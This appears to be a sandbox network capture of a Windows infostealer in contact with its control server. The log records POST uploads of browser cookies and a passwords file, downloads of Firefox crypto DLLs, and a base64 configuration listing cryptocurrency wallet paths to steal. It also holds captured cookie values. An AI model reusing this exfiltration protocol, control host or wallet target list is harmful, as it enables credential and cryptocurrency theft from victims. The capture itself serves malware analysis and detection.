Oct 8, 2024 20:47:23.651613951 CEST	1236	IN	Data Raw: af 87 1e 00 e9 da 21 1d 00 e9 17 0a 1d 00 e9 54 2a 1a 00 e9 b6 59 1b 00 e9 d4 75 00 00 e9 97 40 1c 00 e9 2d 18 1c 00 e9 36 21 1b 00 e9 f4 21 20 00 e9 b1 44 1f 00 e9 be af 1c 00 e9 e1 96 1e 00 e9 6e 6b 1d 00 e9 bb a8 1c 00 e9 92 79 1f 00 e9 ed 8d Data Ascii: !T*Yu@-6!! DnkySD<8~d`14Y^2HNU7V3P][ M #~Vvt5-
Oct 8, 2024 20:47:25.679400921 CEST	1014	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHI Host: kasm.zubairgul.com Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 51 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 [TRUNCATED] Data Ascii: ------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="file_name"Q29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="file_data"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12ZFZad2NIbnFWeldIQVUxNHY1M01OMVZ2d3ZRcThiYVlmZzItSUF0cVpCVjVOT0w1cnZqMk5XSXFyejM3N1VoTGRIdE9nRS10SmFCbFVCWUpFaHVHc1FkcW5pM29USmcwYnJxdjFkamRpTEp5dlRTVWhkSy1jNUpXYWRDU3NVTFBMemhTeC1GLTZ3T2c0Cg==------FCAFIJJJKEGIECAKKEHI--
Oct 8, 2024 20:47:26.482155085 CEST	175	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0
Oct 8, 2024 20:47:26.582616091 CEST	622	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBAKJKJJJECFIEBFHIEG Host: kasm.zubairgul.com Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a [TRUNCATED] Data Ascii: ------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="file_data"------CBAKJKJJJECFIEBFHIEG--
Oct 8, 2024 20:47:27.425154924 CEST	175	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0
Oct 8, 2024 20:47:27.534775972 CEST	622	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHIJJEGDBFIIDGCAKJEB Host: kasm.zubairgul.com Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 45 47 [TRUNCATED] Data Ascii: ------GHIJJEGDBFIIDGCAKJEBContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------GHIJJEGDBFIIDGCAKJEBContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------GHIJJEGDBFIIDGCAKJEBContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------GHIJJEGDBFIIDGCAKJEBContent-Disposition: form-data; name="file_data"------GHIJJEGDBFIIDGCAKJEB--
Oct 8, 2024 20:47:28.330713034 CEST	175	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0
Oct 8, 2024 20:47:28.443079948 CEST	104	OUT	GET /freebl3.dll HTTP/1.1 Host: kasm.zubairgul.com Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 20:47:28.649921894 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:28 GMT Content-Type: application/octet-stream Content-Length: 685392 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: keep-alive ETag: "6315a9f4-a7550" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Oct 8, 2024 20:47:29.429868937 CEST	104	OUT	GET /mozglue.dll HTTP/1.1 Host: kasm.zubairgul.com Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 20:47:29.642432928 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:29 GMT Content-Type: application/octet-stream Content-Length: 608080 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: keep-alive ETag: "6315a9f4-94750" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Oct 8, 2024 20:47:30.424065113 CEST	105	OUT	GET /msvcp140.dll HTTP/1.1 Host: kasm.zubairgul.com Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 20:47:30.732877016 CEST	105	OUT	GET /msvcp140.dll HTTP/1.1 Host: kasm.zubairgul.com Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 20:47:30.938584089 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:30 GMT Content-Type: application/octet-stream Content-Length: 450024 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: keep-alive ETag: "6315a9f4-6dde8" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Oct 8, 2024 20:47:31.379570007 CEST	105	OUT	GET /softokn3.dll HTTP/1.1 Host: kasm.zubairgul.com Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 20:47:31.603955984 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:31 GMT Content-Type: application/octet-stream Content-Length: 257872 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: keep-alive ETag: "6315a9f4-3ef50" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Oct 8, 2024 20:47:31.728624105 CEST	109	OUT	GET /vcruntime140.dll HTTP/1.1 Host: kasm.zubairgul.com Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 20:47:31.933222055 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:31 GMT Content-Type: application/octet-stream Content-Length: 80880 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: keep-alive ETag: "6315a9f4-13bf0" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Oct 8, 2024 20:47:31.946311951 CEST	101	OUT	GET /nss3.dll HTTP/1.1 Host: kasm.zubairgul.com Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 20:47:32.305860043 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:32 GMT Content-Type: application/octet-stream Content-Length: 2046288 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: keep-alive ETag: "6315a9f4-1f3950" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Oct 8, 2024 20:47:34.026621103 CEST	186	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIIJEBAECGCBKECAAAEB Host: kasm.zubairgul.com Content-Length: 1145 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 20:47:34.971224070 CEST	175	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0
Oct 8, 2024 20:47:35.216434956 CEST	516	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AECAKECAEGDHIECBGHII Host: kasm.zubairgul.com Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 2d 2d 0d 0a Data Ascii: ------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="mode"3------AECAKECAEGDHIECBGHII--
Oct 8, 2024 20:47:35.817461014 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 18:47:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 [TRUNCATED] Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzfDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxwYXNzcGhyYXNlLmpzb258MHxFeG9kdXN8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHNlZWQuc2Vjb3wwfEV4b2R1c3wxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RXhvZHVzfDF8XEV4b2R1c1xiYWNrdXBzXHwqLip8MXxFbGVjdHJvbiBDYXNofDF8XEVsZWN0cm9uQ2FzaFx3YWxsZXRzXHwqLip8MHxNdWx0aURvZ2V8MXxcTXVsdGlEb2d [TRUNCATED]
